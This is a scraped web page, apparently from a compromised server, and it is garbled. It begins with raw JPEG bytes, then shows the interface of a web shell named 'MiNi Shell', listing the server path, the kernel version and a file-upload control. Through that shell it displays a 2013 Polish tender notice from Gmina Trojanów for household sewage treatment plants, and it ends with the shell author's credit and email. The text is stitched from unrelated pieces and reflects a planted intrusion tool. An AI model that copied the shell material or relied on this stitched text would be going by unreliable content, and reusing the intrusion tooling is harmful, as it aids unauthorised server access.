JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130702/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130702/130529-N-2013.html

<p class="kh_header"><b>Trojanów: Budowa przydomowych oczyszczalni ścieków</b><br>
<b>Numer ogłoszenia: 130529 - 2013; data zamieszczenia: 02.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Trojanów-Urząd Gminy Trojanów , Trojanów 57a, 08-455 Trojanów, woj. mazowieckie, tel. 0-25 6827120 w. 34, faks 0-25 6827195.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.trojanow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa przydomowych oczyszczalni ścieków.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Budowa 226 szt. przydomowych biologicznych oczyszczalni ścieków sanitarnych z odprowadzeniem wód oczyszczonych do studni chłonnych, z czego 149 szt. to oczyszczalnie o Q dobowym do 0,6m3, 71 szt. to oczyszczalnie o Q dobowym do 0,96m3, 5 szt. to oczyszczalnie o Q dobowym do 1,44m3, i 1 szt. to oczyszczalnia o Q dobowym do 6,00m3.  Przedmiotowe oczyszczalnie, w przeważającej większości zlokalizowane będą przy budynkach mieszkalnych jednorodzinnych w zabudowie zagrodowej w miejscowościach: Babice, Trojanów, Budziska, Mroków, Wola Korycka Dolna, Wola Korycka Górna, Derlatka, Dudki, Elżbietów, Ruda, Skruda, Korytnica, Damianów, Prandocin, Dębówka, Jabłonowiec, Życzyn, Wola Życka, Kozice, Podebłocie, Majdan, Piotrówek, Więcków i Żabianka na terenie Gminy Trojanów, zgodnie z opracowanymi przedmiarami robót i dokumentacją projektową załączoną do SIWZ.
1.	Przedmiot umowy obejmuje wszystkie czynności umożliwiające i mające na celu wykonanie dostawy i montażu przydomowych oczyszczalni ścieków z przyłączami oraz odbiornikiem ścieków oczyszczonych. Będzie to wykonanie następujących robót:
1)	przygotowawczych w postaci wytyczenia geodezyjnego urządzeń i zabezpieczenia placu budowy,
2)	ziemnych dla reaktora oczyszczalni, studni chłonnej, pompowni ścieków surowych i oczyszczonych oraz przyłączy kanalizacyjnych i elektrycznych,
3)	dostawczych i montażowych reaktora oczyszczalni,
4)	dostawczych i montażowych przyłączy kanalizacji sanitarnej,
5)	dostawczych i montażowych zasilania elektrycznego,
6)	dostawczych i montażowych elementów studni chłonnych,
7)	dostawczych i montażowych elementów pompowni ścieków surowych,
8)	rozruchowych i pomiarowych kompletnej oczyszczalni,
9)	dokumentacyjnych - dokumentacja powykonawcza w skład której wchodzi: 
a)	inwentaryzacja powykonawcza,
b)	badania ścieków z wybranych oczyszczalni,
c)	protokoły badań instalacji elektrycznej,
d)	protokoły odbioru technicznego instalacji oczyszczalni z nr urządzeń,
e)	oświadczenie użytkownika o udzielenie instrukcji obsługi, uporządkowaniu terenu
f)	DTR dla zamontowanych urządzeń.
2.	Szczegółowy zakres robót opisany został w dokumentacji projektowej, przedmiarach robót, specyfikacji technicznej wykonania i odbioru robót budowlanych, oraz w Specyfikacji Istotnych Warunków Zamówienia i ofercie Wykonawcy. 
3.	Wykonawca zobowiązuje się do wykonania przedmiotu umowy zgodnie z dokumentacją projektową, zasadami rzetelnej wiedzy technicznej i sztuki budowlanej, obowiązującymi przepisami i polskimi i europejskimi normami. 
4.	Wykonawca zobowiązany jest zapewnić wykonanie i kierowanie robotami obiętymi umową i niniejszą specyfikacją przez osobę posiadającą stosowne kwalifikacje zawodowe będącą członkiem Izby Inżynierów legitymującej się Uprawnieniami Budowlanymi  oraz zaświadczeniem przynależności do Izby.
5.	Wykonawca zobowiązany jest dostarczyć certyfikat/deklarację zgodności z normą 
PN-EN 12566:3+A1:2009  dla zaoferowanych oczyszczalni, w której podane będą wskaźniki skuteczności oczyszczania, wytrzymałość konstrukcyjna, wodoszczelność i trwałość.

INFORMACJA: W przypadku wystąpienia w przedmiarze robót nazw elementów, urządzeń materiałów itp. w postaci znaków towarowych, norm, aprobat, specyfikacji technicznych, certyfikatów i innych systemów odniesienia, zamawiający dopuszcza rozwiązania równoważne opisywanym.  

Dopuszcza się zmianę urządzeń zastosowanych w niniejszym opracowaniu pod warunkiem zastosowania urządzeń wykorzystujących technologię niskoobciążonego osadu czynnego z biologicznym złożem zatapialnym o powierzchni 10m2/1RLM,
oraz spełniające warunki równoważne pod względem eksploatacyjnym, technicznym i ekonomicznym. 
Zaoferowane przez wykonawcę urządzenia nie mogą zmieniać założeń technologicznych decyzji pozwolenia na budowę oraz zgłoszenia współfinansującemu. 
W celu ustalenia równoważności przez zamawiającego oferent winien załączyć kartę katalogową produktu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.25.21.27-4, 45.25.22.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium. 
1.	Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium w wysokości:  30.000,00 zł (słownie: trzydzieści tysięcy złotych) przed upływem terminu składania ofert. 
2.	Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:  
1)	pieniądzu, przelewem na rachunek bankowy;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;  
3)	gwarancjach bankowych;  
4)	gwarancjach ubezpieczeniowych; 
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010r. Nr 96, poz. 620).  
3.	Wadium wniesione w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: 47 9210 0008 0052 3121 2000 0010  z dopiskiem: Budowa przydomowych oczyszczalni ścieków.
4.	Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego, a wadium uważa się za wniesione w terminie, jeżeli kwota wadium znajdzie się na rachunku bankowym Zamawiającego przed upływem terminu składania ofert.
5.	Dowód wniesienia wadium powinien być dołączony do oferty.
6.	W przypadku niezabezpieczeni oferty jedną z określonych w niniejszej specyfikacji form wadium wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać będzie odrzuceniu.
7.	W zakresie dotyczącym wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na podstawie załączonych dokumentów i oświadczeń, o których mowa w rozdz. VI SIWZ.
Ocena spełnienia warunków dokonywana będzie w systemie 0-1 (tj. spełnia - nie spełnia).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na podstawie załączonych dokumentów i oświadczeń, o których mowa w rozdz. VI SIWZ.
Ocena spełnienia warunków dokonywana będzie w systemie 0-1 (tj. spełnia - nie spełnia).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na podstawie załączonych dokumentów i oświadczeń, o których mowa w rozdz. VI SIWZ.
Ocena spełnienia warunków dokonywana będzie w systemie 0-1 (tj. spełnia - nie spełnia).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na podstawie załączonych dokumentów i oświadczeń, o których mowa w rozdz. VI SIWZ.
Ocena spełnienia warunków dokonywana będzie w systemie 0-1 (tj. spełnia - nie spełnia).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na podstawie załączonych dokumentów i oświadczeń, o których mowa w rozdz. VI SIWZ.
Ocena spełnienia warunków dokonywana będzie w systemie 0-1 (tj. spełnia - nie spełnia).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykonawcy powinni udokumentować posiadanie wiedzy i doświadczenia poprzez wykazanie w swoim wykazie robót, przynajmniej dwóch robót o podobnym lub porównywalnym zakresie tj. dotyczących budowy przydomowych oczyszczalni ścieków, w ilości łącznej nie mniejszej niż 150 szt. wszystkich wykonanych oczyszczalni lub o wartości łącznej nie mniejszej niż 1 500 000,00 zł.;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.  formularz ofertowy wypełniony i podpisany przez wykonawcę z wykorzystaniem wzoru- zał. 1 wraz z dokumentami i załącznikami. 
2.  oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych (wzór - zał. Nr 2), 
3.  oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia z art. 24 ust. 1 Prawa zamówień publicznych (wzór - zał. Nr 3).
4.  potwierdzenie wniesienia wadium.
5.  kosztorys ofertowy szczegółowy sporządzony na podstawie załączonych do siwz
         przedmiarów robót. 
6.  informacja o Podwykonawcach (Jeżeli dotyczy) (wzór - zał. Nr 9).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający, w myśl art. 144 ust 1 Pzp, przewiduje zmiany postanowień zawartej z wykonawcą umowy w stosunku do treści złożonej przez niego oferty, zgodnie z niżej określonymi warunkami tych zmian, w przypadkach: 
 1) zmiany zakresu przedmiotu umowy polegającym na zwiększeniu lub zmniejszeniu zakresu robót, czyli ilości budowanych przydomowych oczyszczalni ścieków i sposobu wykonania robót, spowodowanym:
-   nieprzewidzianymi istotnymi okolicznościami, np. rezygnacją właściciela nieruchomości z budowy przedmiotowej oczyszczalni, lub ingerencją w sposób jej wykonania, 
-  nieobjętymi w dokumentacji technicznej (przedmiarze robót) innymi robotami, które będą konieczne lub zasadne do właściwego wykonania i prawidłowego funkcjonowania przedmiotu umowy;
- zmianą przepisów powodujących konieczność przyjęcia innych rozwiązań technicznych poszczególnych elementów obiektu niż przewidzianych w dokumentacji projektowej (technicznej),
- zaistnieniem istotnej zmiany okoliczności powodującej, że wykonanie części przedmiotu umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy,
- niedostępnością materiałów lub urządzeń wskazanych w ofercie, dokumentacji projektowej lub technicznej, zwłaszcza z uwagi na zaprzestanie produkcji lub wycofaniem z rynku tych materiałów lub urządzeń,
- pojawieniem się materiałów, części lub urządzeń nowszej generacji pozwalających na zmniejszenie kosztów eksploatacji wykonanego przedmiotu umowy,
- koniecznością zrealizowania robót przy zastosowaniu innych rozwiązań technicznych lub technologicznych niż wskazane w ofercie, dokumentacji projektowej lub technicznej, w sytuacji gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem projektu,
- inną zmianą zakresu robót budowlanych wynikającą ze zmiany dokumentacji projektowej (technicznej), której nie przewidziano w dniu zawarcia umowy, a jest konieczna do zrealizowania przedmiotu umowy, w tym dokonana na podstawie art. 23 pkt 1 ustawy - Prawo budowlane, lub zaleconą przez inspektora nadzoru inwestorskiego.
2)  zmiany terminu wykonania robót spowodowanego: 
- powyższymi zmianami zakresu przedmiotu umowy, wyszczególnionymi w ust. 2, pkt 1, lub wskutek wystąpienia niekorzystnych warunków atmosferycznych uniemożliwiających wykonanie umowy w uzgodnionym terminie, ewentualnie wskutek wystąpienia siły wyższej czy zaistnienia innych nieprzewidzianych okoliczności lub zdarzeń.
- niemożliwymi uprzednio do przewidzenia brakami w dokumentacji projektowej (technicznej), za co nie można przypisać winy Wykonawcy;
- wstrzymaniem prac lub ingerencją w ich zakres przez właściwy organ administracji publicznej albo jako wykonanie prawomocnego orzeczeniem sądu, z przyczyn nie zawinionych przez Wykonawcę, a także jako skutek przekroczenia przez organy administracji i sądy określonych przez prawo terminów wydania decyzji, zezwoleń, orzeczeń, itp., albo przez  właściciela nieruchomości,
- potrzebą wykonania części robót inną technologią niż założono w dokumentacji projektowej (technicznej) albo potrzebą wykonania robót dodatkowych,
- wystąpieniem udokumentowanych przez Wykonawcę, nie zawinionych przez niego opóźnień w realizacji umowy, w szczególności na skutek okoliczności leżących po stronie Zamawiającego lub osób trzecich, a także w razie wystąpienia siły wyższej. Przez siłę wyższą należy rozumieć zdarzenie nagłe, niezależne od woli stron umowy, którego zaistnienia oraz jego skutków nie można było przewidzieć w chwili zawierania umowy przy zachowaniu należytej staranności, spowodowane np.: kataklizmami naturalnymi (powódź, trzęsienie ziemi, pożar, eksplozja, klęski żywiołowe), konfliktami wojskowymi, interwencjami władz państwowych, itp. 
3)   zmiany ceny za wykonanie przedmiotu umowy  wynikającej z wyżej wymienionej konieczności zmiany zakresu przedmiotu umowy czyli ilości wybudowanych przydomowych oczyszczalni ścieków, zastosowania innych technologii lub innego sposobu wykonania robót, wyszczególnionych w ust. 2, pkt 1 zatwierdzonych przez inspektora nadzoru.

4) zmiany innych postanowień umowy spowodowanych:
-   zmianą stawek podatku od towarów i usług,
-  innymi zmianami, które są korzystne dla Zamawiającego, takie jak: wydłużenie okresu gwarancji lub rękojmi,
-  okolicznościami wynikającymi z przyczyn technicznych, gospodarczych, finansowych, organizacyjnych, losowych i innych nieprzewidzianych zdarzeń itp.

3. Okoliczności wymienione w ust. 2 stanowią katalog, w oparciu o który Zamawiający dopuszcza możliwość zmiany postanowień umowy. Okoliczności te nie stanowią jednocześnie zobowiązania Zamawiającego do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.trojanow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Trojanowie, 08-455 Trojanów 57A, pok. Nr 12 w godz 8:30 - 15:30.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.07.2013 godzina 09:30, miejsce: Urząd Gminy w Trojanowie, 08-455 Trojanów 57A, pok. Nr 3 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Niniejsze przedsięwzięcie będzie dofinansowane zgodnie z umową o przyznanie pomocy Nr 00168-6921-UM0700089/11 z dnia 29 listopada 2012r. w ramach działania Podstawowe Usługi dla Gospodarki i Ludności Wiejskiej objętego PROW na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com